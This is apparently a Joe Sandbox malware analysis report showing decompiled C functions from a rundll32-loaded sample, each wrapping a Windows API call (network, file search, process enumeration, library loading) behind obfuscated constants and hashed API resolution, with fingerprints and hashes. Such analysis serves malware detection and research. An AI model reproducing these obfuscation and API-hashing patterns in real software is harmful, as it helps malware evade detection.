                                                                                                                                0x00f4153b
                                                                                                                                0x00f41542
                                                                                                                                0x00f41546
                                                                                                                                0x00f4155d
                                                                                                                                0x00f41571
                                                                                                                                0x00f41576

                                                                                                                                APIs
                                                                                                                                • InternetReadFile.WININET(00414480,00635419,00242353,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00F41571
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileInternetRead
                                                                                                                                • String ID: M~$S#$
                                                                                                                                • API String ID: 778332206-2280054159
                                                                                                                                • Opcode ID: aba13f9e3387982c78d3daab03ad9a032f14650be2f1b69adc6238fd1d7e46ca
                                                                                                                                • Instruction ID: 64241939c05fbf1fa2ebab3e9b9de4c68a5f5da864ce59041f3b1c344759fb57
                                                                                                                                • Opcode Fuzzy Hash: aba13f9e3387982c78d3daab03ad9a032f14650be2f1b69adc6238fd1d7e46ca
                                                                                                                                • Instruction Fuzzy Hash: 8D01E572C0120EFBCF059FD4DD469DEBFB5EB54309F508088FA1426261D3BA8A64AB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F4A461, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 71%
                                                                                                                                			E00F4A461(void* __ecx, void* __edx, intOrPtr _a4, struct _WIN32_FIND_DATAW* _a8, WCHAR* _a12) {
				signed int _v8;
				signed int _v12;
				void* _t18;
				void* _t23;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00F4BB26(_t18);
				_v12 = 0xe700;
				_v12 = _v12 | 0xc4090de4;
				_v12 = _v12 ^ 0xc409ad86;
				_v8 = 0x9bfc;
				_v8 = _v8 + 0x72e3;
				_v8 = _v8 ^ 0x000179c0;
				E00F5915E(0x11c, 0xe0ee0af6, 0xf90a85c5);
				_t23 = FindFirstFileW(_a12, _a8); // executed
				return _t23;
			}







                                                                                                                                0x00f4a466
                                                                                                                                0x00f4a469
                                                                                                                                0x00f4a46c
                                                                                                                                0x00f4a471
                                                                                                                                0x00f4a476
                                                                                                                                0x00f4a480
                                                                                                                                0x00f4a48c
                                                                                                                                0x00f4a493
                                                                                                                                0x00f4a49a
                                                                                                                                0x00f4a4a1
                                                                                                                                0x00f4a4b8
                                                                                                                                0x00f4a4c6
                                                                                                                                0x00f4a4cb

                                                                                                                                APIs
                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00F4A4C6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindFirst
                                                                                                                                • String ID: r
                                                                                                                                • API String ID: 1974802433-2386229178
                                                                                                                                • Opcode ID: 4c11c40c90ffe02b9f291ba6b4c4355669ac6000b7b8acbb7aef0fa5b4a2856b
                                                                                                                                • Instruction ID: edb5cd3e38440882b6c9d23d08b0cf64933e3ff932acc2c9f415e7be363dd363
                                                                                                                                • Opcode Fuzzy Hash: 4c11c40c90ffe02b9f291ba6b4c4355669ac6000b7b8acbb7aef0fa5b4a2856b
                                                                                                                                • Instruction Fuzzy Hash: 30F067B180520CFFDF05DFD0CD0689E7FB4EB04311F108488B90866211E37A9B64AB80
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F593E4, Relevance: 1.6, APIs: 1, Instructions: 53encryptionCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • CryptDecodeObjectEx.CRYPT32(EBCF86B6,?,4DD5381D,B1E7324B,?,00000000,860B3FA0,00008253), ref: 00F5948E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CryptDecodeObject
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1207547050-0
                                                                                                                                • Opcode ID: ae9d5ca7cb4f1cedbffe93ad24968d9511f12b017ddd7012b3a622c5cd0d1b6d
                                                                                                                                • Instruction ID: bb05822fe4e8b36b553c4f79abe2cbefb1b0d516e096329447e3900c93c8810d
                                                                                                                                • Opcode Fuzzy Hash: ae9d5ca7cb4f1cedbffe93ad24968d9511f12b017ddd7012b3a622c5cd0d1b6d
                                                                                                                                • Instruction Fuzzy Hash: 9A11CF72800208FFDF46AF94CD46ADDBF72FF08704F109148FA1926161D7728AA0EB40
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F590E0, Relevance: 1.5, APIs: 1, Instructions: 35processCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 37%
                                                                                                                                			E00F590E0(void* __ecx, int __edx) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				void* _t32;
				int _t33;

				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x20a5bc;
				_v24 = 0x4de1f3;
				_v12 = 0x2345;
				_v12 = _v12 << 3;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x00006aaa;
				_v8 = 0x1846;
				_push(0xf90a85c5);
				_push(0xdc0f1baa);
				_v8 = _v8 * 0x12;
				_t33 = __edx;
				_v8 = _v8 + 0xffffb2f2;
				_v8 = _v8 + 0x1bc5;
				_v8 = _v8 ^ 0x000196eb;
				_t32 = 0x37;
				E00F5915E(_t32);
				_t29 = CreateToolhelp32Snapshot(_t33, 0); // executed
				return _t29;
			}












                                                                                                                                0x00f590e6
                                                                                                                                0x00f590ea
                                                                                                                                0x00f590ee
                                                                                                                                0x00f590f5
                                                                                                                                0x00f590fc
                                                                                                                                0x00f59103
                                                                                                                                0x00f59107
                                                                                                                                0x00f5910b
                                                                                                                                0x00f59112
                                                                                                                                0x00f5911f
                                                                                                                                0x00f59124
                                                                                                                                0x00f59129
                                                                                                                                0x00f5912c
                                                                                                                                0x00f5912e
                                                                                                                                0x00f59135
                                                                                                                                0x00f5913c
                                                                                                                                0x00f5914b
                                                                                                                                0x00f5914c
                                                                                                                                0x00f59157
                                                                                                                                0x00f5915d

                                                                                                                                APIs
                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(?,00000000,?,?,000025F3), ref: 00F59157
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateSnapshotToolhelp32
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3332741929-0
                                                                                                                                • Opcode ID: 1418396c3a5ea316a64f2cb4593907badfc609f0a73eaef9ffe606ee10a29cf9
                                                                                                                                • Instruction ID: 68148a3b2f38a2ed3b65e91b8712d3e58841d9a6cc188ebdc5708bb2ea00e0d0
                                                                                                                                • Opcode Fuzzy Hash: 1418396c3a5ea316a64f2cb4593907badfc609f0a73eaef9ffe606ee10a29cf9
                                                                                                                                • Instruction Fuzzy Hash: 5A0128B2D15308EBDB14EFE4CA496DEBBB4AB00319F608089D40066280D3B91B499F81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F4974A, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 50networkCOMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 628 f4974a-f497dd call f4bb26 call f5915e InternetOpenW
                                                                                                                                C-Code - Quality: 55%
                                                                                                                                			E00F4974A(long __ecx, intOrPtr _a4, char _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				signed int _v8;
				signed int _v12;
				WCHAR* _v16;
				intOrPtr _v20;
				void* _t27;
				void* _t34;
				signed int _t36;
				long _t41;

				_push(_a28);
				_t41 = __ecx;
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(0);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E00F4BB26(_t27);
				_v20 = 0x230950;
				_v16 = 0;
				_v8 = 0x637b;
				_v8 = _v8 | 0xedf4c6fd;
				_v8 = _v8 + 0xffff8766;
				_v8 = _v8 ^ 0xedf44ddd;
				_v12 = 0x368c;
				_t36 = 0x34;
				_v12 = _v12 / _t36;
				_v12 = _v12 ^ 0x00005563;
				E00F5915E(0x21d, 0xd2cd92be, 0x699633b1);
				_t26 =  &_a12; // 0x230950, executed
				_t34 = InternetOpenW( *_t26, _t41, 0, 0, 0); // executed
				return _t34;
			}











                                                                                                                                0x00f49752
                                                                                                                                0x00f49757
                                                                                                                                0x00f49759
                                                                                                                                0x00f4975c
                                                                                                                                0x00f4975f
                                                                                                                                0x00f49760
                                                                                                                                0x00f49763
                                                                                                                                0x00f49764
                                                                                                                                0x00f49767
                                                                                                                                0x00f49768
                                                                                                                                0x00f49769
                                                                                                                                0x00f4976e
                                                                                                                                0x00f49777
                                                                                                                                0x00f4977a
                                                                                                                                0x00f49781
                                                                                                                                0x00f49788
                                                                                                                                0x00f4978f
                                                                                                                                0x00f49796
                                                                                                                                0x00f497a2
                                                                                                                                0x00f497ad
                                                                                                                                0x00f497b0
                                                                                                                                0x00f497c7
                                                                                                                                0x00f497d3
                                                                                                                                0x00f497d6
                                                                                                                                0x00f497dd

                                                                                                                                APIs
                                                                                                                                • InternetOpenW.WININET(P#,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 00F497D6
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InternetOpen
                                                                                                                                • String ID: P#$P#$cU${c
                                                                                                                                • API String ID: 2038078732-3365909388
                                                                                                                                • Opcode ID: aa0d316a93222f344f818844ca9f044df7bac76a4c6ccb24a4a7cc79e33d5bc8
                                                                                                                                • Instruction ID: 790e6847f6304e74540edf4eaeb10b4f64192ecf1140d4abd09d43f6629d7570
                                                                                                                                • Opcode Fuzzy Hash: aa0d316a93222f344f818844ca9f044df7bac76a4c6ccb24a4a7cc79e33d5bc8
                                                                                                                                • Instruction Fuzzy Hash: 56015772804248BBDF24DF96CC4ACCFBFB9EFC5710F008089B91466260D7B64A21DBA1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F4BB27, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 58%
                                                                                                                                			E00F4BB27(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t34;
				intOrPtr* _t42;
				void* _t43;
				signed int _t45;
				signed int _t46;

				E00F4BB26(_t34);
				_v28 = 0x1436d7;
				_v24 = 0x2ef4fe;
				_v20 = 0;
				_v16 = 0;
				_v12 = 0x447;
				_t45 = 0x55;
				_v12 = _v12 / _t45;
				_v12 = _v12 >> 8;
				_v12 = _v12 ^ 0x0000741d;
				_v8 = 0x626c;
				_t46 = 0x22;
				_v8 = _v8 / _t46;
				_v8 = _v8 << 1;
				_v8 = _v8 ^ 0x00000cab;
				_t42 = E00F5915E(0x102, 0xc4b91c54, 0x12faf684);
				_t43 =  *_t42(0, _a16, _a12, __ecx, __edx, 0, _a8, _a12, _a16); // executed
				return _t43;
			}














                                                                                                                                0x00f4bb3c
                                                                                                                                0x00f4bb41
                                                                                                                                0x00f4bb4a
                                                                                                                                0x00f4bb51
                                                                                                                                0x00f4bb54
                                                                                                                                0x00f4bb57
                                                                                                                                0x00f4bb63
                                                                                                                                0x00f4bb68
                                                                                                                                0x00f4bb6d
                                                                                                                                0x00f4bb71
                                                                                                                                0x00f4bb78
                                                                                                                                0x00f4bb82
                                                                                                                                0x00f4bb8d
                                                                                                                                0x00f4bb90
                                                                                                                                0x00f4bb93
                                                                                                                                0x00f4bbaa
                                                                                                                                0x00f4bbb9
                                                                                                                                0x00f4bbbf

                                                                                                                                APIs
                                                                                                                                • ObtainUserAgentString.URLMON(00000000,002EF4FE,?,?,?,?,?,?,?,?), ref: 00F4BBB9
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AgentObtainStringUser
                                                                                                                                • String ID: lb
                                                                                                                                • API String ID: 2681117516-724383264
                                                                                                                                • Opcode ID: 47ea216081cda5d0b7e56488a9bb852d7ba1bf428d0cd88797943155fd2e1b66
                                                                                                                                • Instruction ID: d9245c8ce9882a7d527d66ffd62cfd35bf0145bb7d85ce1c811765fc9df3fb8f
                                                                                                                                • Opcode Fuzzy Hash: 47ea216081cda5d0b7e56488a9bb852d7ba1bf428d0cd88797943155fd2e1b66
                                                                                                                                • Instruction Fuzzy Hash: 84114571D00209BBEB04DFE4CD098CEBFB5EB44300F208099EA086A290D3B64B609B91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F442F4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 58%
                                                                                                                                			E00F442F4(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t38;
				intOrPtr* _t48;
				void* _t49;
				signed int _t51;
				signed int _t52;
				signed int _t53;

				E00F4BB26(_t38);
				_v16 = _v16 & 0x00000000;
				_v24 = 0xcffb4;
				_v20 = 0x21620f;
				_v8 = 0xfe3f;
				_t51 = 0x15;
				_v8 = _v8 / _t51;
				_v8 = _v8 + 0xffff0986;
				_t52 = 0xe;
				_v8 = _v8 / _t52;
				_v8 = _v8 ^ 0x124952a5;
				_v12 = 0xeeb7;
				_v12 = _v12 >> 0xe;
				_t53 = 0x6b;
				_v12 = _v12 / _t53;
				_v12 = _v12 ^ 0x00004779;
				_t48 = E00F5915E(0x10f, 0xb1929998, 0xf90a85c5);
				_t49 =  *_t48(_a8, __ecx, __edx, _a4, _a8); // executed
				return _t49;
			}














                                                                                                                                0x00f44302
                                                                                                                                0x00f44307
                                                                                                                                0x00f4430d
                                                                                                                                0x00f44314
                                                                                                                                0x00f4431b
                                                                                                                                0x00f44327
                                                                                                                                0x00f4432c
                                                                                                                                0x00f44331
                                                                                                                                0x00f4433b
                                                                                                                                0x00f44340
                                                                                                                                0x00f44345
                                                                                                                                0x00f4434c
                                                                                                                                0x00f44353
                                                                                                                                0x00f4435a
                                                                                                                                0x00f44365
                                                                                                                                0x00f44368
                                                                                                                                0x00f4437f
                                                                                                                                0x00f4438a
                                                                                                                                0x00f4438f

                                                                                                                                APIs
                                                                                                                                • GetNativeSystemInfo.KERNEL32(00000000,?,?,?,?,?,?), ref: 00F4438A
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: InfoNativeSystem
                                                                                                                                • String ID: yG
                                                                                                                                • API String ID: 1721193555-1469842547
                                                                                                                                • Opcode ID: 42efb6d08359ec9ccb781363735e29a1015edebb01dc1a48c880ffb3dea5581b
                                                                                                                                • Instruction ID: 5a648f68b1111d225a3385e7dcabf46597b6ff62eca455e8b2dc207ca331659c
                                                                                                                                • Opcode Fuzzy Hash: 42efb6d08359ec9ccb781363735e29a1015edebb01dc1a48c880ffb3dea5581b
                                                                                                                                • Instruction Fuzzy Hash: CE1161B6E0120CFBEF14DFE4C94A9DDBBB2EB84310F20C099E9046B294D7B65B559B40
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F49124, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 68%
                                                                                                                                			E00F49124(void* __ecx, void* __edx, void* _a4, struct _WIN32_FIND_DATAW* _a8, intOrPtr _a12, intOrPtr _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t25;
				int _t32;
				signed int _t34;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E00F4BB26(_t25);
				_v12 = 0x6b4f;
				_v12 = _v12 ^ 0x678cd26f;
				_v12 = _v12 ^ 0x678cefb7;
				_v8 = 0x4189;
				_t34 = 0xa;
				_v8 = _v8 / _t34;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x00006796;
				E00F5915E(0x131, 0xc63be0fd, 0xf90a85c5);
				_t32 = FindNextFileW(_a4, _a8); // executed
				return _t32;
			}








                                                                                                                                0x00f49129
                                                                                                                                0x00f4912c
                                                                                                                                0x00f4912f
                                                                                                                                0x00f49132
                                                                                                                                0x00f49137
                                                                                                                                0x00f4913c
                                                                                                                                0x00f49145
                                                                                                                                0x00f4914c
                                                                                                                                0x00f49153
                                                                                                                                0x00f4915f
                                                                                                                                0x00f4916a
                                                                                                                                0x00f4916d
                                                                                                                                0x00f49171
                                                                                                                                0x00f49188
                                                                                                                                0x00f49196
                                                                                                                                0x00f4919b

                                                                                                                                APIs
                                                                                                                                • FindNextFileW.KERNELBASE(678CEFB7,?), ref: 00F49196
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FileFindNext
                                                                                                                                • String ID: Ok
                                                                                                                                • API String ID: 2029273394-3965254117
                                                                                                                                • Opcode ID: 2c9607e2994ca0132c2629e868301ca9668b96cdf8354782933cabe97ea9329a
                                                                                                                                • Instruction ID: 1810421ef093bbed244e0b9cd38a9fd7dc8b96b282f1f9736a98f84dceb0c20d
                                                                                                                                • Opcode Fuzzy Hash: 2c9607e2994ca0132c2629e868301ca9668b96cdf8354782933cabe97ea9329a
                                                                                                                                • Instruction Fuzzy Hash: 460131B5905208FBDF04DFE0CD469DEBFB6EB54300F108498F90496250D7769F64AB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F44231, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36libraryCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 75%
                                                                                                                                			E00F44231(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t24;
				struct HINSTANCE__* _t29;
				WCHAR* _t33;

				_push(_a12);
				_t33 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00F4BB26(_t24);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x7472c3;
				_v24 = 0x3cf48e;
				_v12 = 0x873a;
				_v12 = _v12 ^ 0x8b6a531b;
				_v12 = _v12 ^ 0x8b6afc74;
				_v8 = 0x3a82;
				_v8 = _v8 | 0x092d362c;
				_v8 = _v8 + 0xffffba9d;
				_v8 = _v8 ^ 0x092cd7ad;
				E00F5915E(0x11f, 0x87b33670, 0xf90a85c5);
				_t29 = LoadLibraryW(_t33); // executed
				return _t29;
			}












                                                                                                                                0x00f44238
                                                                                                                                0x00f4423b
                                                                                                                                0x00f4423d
                                                                                                                                0x00f44240
                                                                                                                                0x00f44244
                                                                                                                                0x00f44245
                                                                                                                                0x00f4424a
                                                                                                                                0x00f44251
                                                                                                                                0x00f4425a
                                                                                                                                0x00f44261
                                                                                                                                0x00f44268
                                                                                                                                0x00f4426f
                                                                                                                                0x00f44276
                                                                                                                                0x00f4427d
                                                                                                                                0x00f44284
                                                                                                                                0x00f4428b
                                                                                                                                0x00f44292
                                                                                                                                0x00f442a9
                                                                                                                                0x00f442b2
                                                                                                                                0x00f442b8

                                                                                                                                APIs
                                                                                                                                • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?), ref: 00F442B2
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: LibraryLoad
                                                                                                                                • String ID: ,6-
                                                                                                                                • API String ID: 1029625771-2997925107
                                                                                                                                • Opcode ID: 928f9de9d1f7c5ce193d0202e3949f5635036c8e82479e1528a6c3d2386ca005
                                                                                                                                • Instruction ID: 0b8212f3b4d02a42528234abdf1f9d9277722f3f7653b94b7688765aa54fecdd
                                                                                                                                • Opcode Fuzzy Hash: 928f9de9d1f7c5ce193d0202e3949f5635036c8e82479e1528a6c3d2386ca005
                                                                                                                                • Instruction Fuzzy Hash: E30128B5C15209FBDF04EFE4C80AADEBBB5FB10315F108188E914A6211D3B54B549B92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F45868, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35networkCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 20%
                                                                                                                                			E00F45868(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* __edx;
				void* _t21;
				int _t26;
				void* _t29;
				void* _t30;

				_push(_a8);
				_t30 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00F4BB26(_t21);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x752ec3;
				_v20 = 0x5fe517;
				_v8 = 0xe5f2;
				_v8 = _v8 + 0xffff7216;
				_v8 = _v8 | 0xe5b4b10b;
				_v8 = _v8 ^ 0xe5b4c8d8;
				_v12 = 0xd5b0;
				_v12 = _v12 + 0xffff864e;
				_v12 = _v12 ^ 0x0000777c;
				_push(0x699633b1);
				_push(0x7ca02a6d);
				_t29 = 0x2f;
				E00F5915E(_t29);
				_t26 = InternetCloseHandle(_t30); // executed
				return _t26;
			}













                                                                                                                                0x00f4586f
                                                                                                                                0x00f45872
                                                                                                                                0x00f45874
                                                                                                                                0x00f45878
                                                                                                                                0x00f45879
                                                                                                                                0x00f4587e
                                                                                                                                0x00f45885
                                                                                                                                0x00f4588c
                                                                                                                                0x00f45893
                                                                                                                                0x00f4589a
                                                                                                                                0x00f458a1
                                                                                                                                0x00f458a8
                                                                                                                                0x00f458af
                                                                                                                                0x00f458b6
                                                                                                                                0x00f458bd
                                                                                                                                0x00f458ca
                                                                                                                                0x00f458cf
                                                                                                                                0x00f458d6
                                                                                                                                0x00f458d7
                                                                                                                                0x00f458e0
                                                                                                                                0x00f458e6

                                                                                                                                APIs
                                                                                                                                • InternetCloseHandle.WININET(?,?,?,?,?,?), ref: 00F458E0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp Download File
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp Download File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CloseHandleInternet
                                                                                                                                • String ID: |w
                                                                                                                                • API String ID: 1081599783-204652698
                                                                                                                                • Opcode ID: 8c65f9315396dccea8f5f0357f7f064bcd510294474e00413fd2794daba787d7
                                                                                                                                • Instruction ID: 26e56e47e331808cc1b0d8a3f8f91e6e985bcf7656bf6c41e97aee5398ab2f47
                                                                                                                                • Opcode Fuzzy Hash: 8c65f9315396dccea8f5f0357f7f064bcd510294474e00413fd2794daba787d7
                                                                                                                                • Instruction Fuzzy Hash: 78016D75C0571CBBDB10DF94DC4A8AEBF74EB40319F108198E80466261E7B84B049B91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00F523A0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 76%
                                                                                                                                			E00F523A0(void* __ecx, struct tagPROCESSENTRY32W __edx, intOrPtr _a4, void* _a8) {
				signed int _v8;
				signed int _v12;
				void* _t20;
				int _t26;
				struct tagPROCESSENTRY32W _t31;

				_push(_a8);
				_t31 = __edx;
				_push(_a4);
				_push(__edx);
				E00F4BB26(_t20);
				_v12 = 0x6c20;
				_v12 = _v12 * 0x71;
				_v12 = _v12 ^ 0xf09b7a3b;
				_v12 = _v12 ^ 0xf0b4e3b2;
				_v8 = 0x2bb2;
				_v8 = _v8 | 0x783053b8;
				_v8 = _v8 ^ 0x6a324d53;
				_v8 = _v8 ^ 0x12023e9f;
				E00F5915E(0x18c, 0xd5f38484, 0xf90a85c5);
				_t26 = Process32NextW(_a8, _t31); // executed
				return _t26;
			}








                                                                                                                                0x00f523a6
                                                                                                                                0x00f523a9
                                                                                                                                0x00f523ab
                                                                                                                                0x00f523ae
                                                                                                                                0x00f523b0
                                                                                                                                0x00f523b5
                                                                                                                                0x00f523d2
                                                                                                                                0x00f523d5
                                                                                                                                0x00f523dc
                                                                                                                                0x00f523e3
                                                                                                                                0x00f523ea
                                                                                                                                0x00f523f1
                                                                                                                                0x00f523f8
                                                                                                                                0x00f52405
                                                                                                                                0x00f52411
                                                                                                                                0x00f52417

                                                                                                                                APIs
                                                                                                                                • Process32NextW.KERNEL32(?,?), ref: 00F52411
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
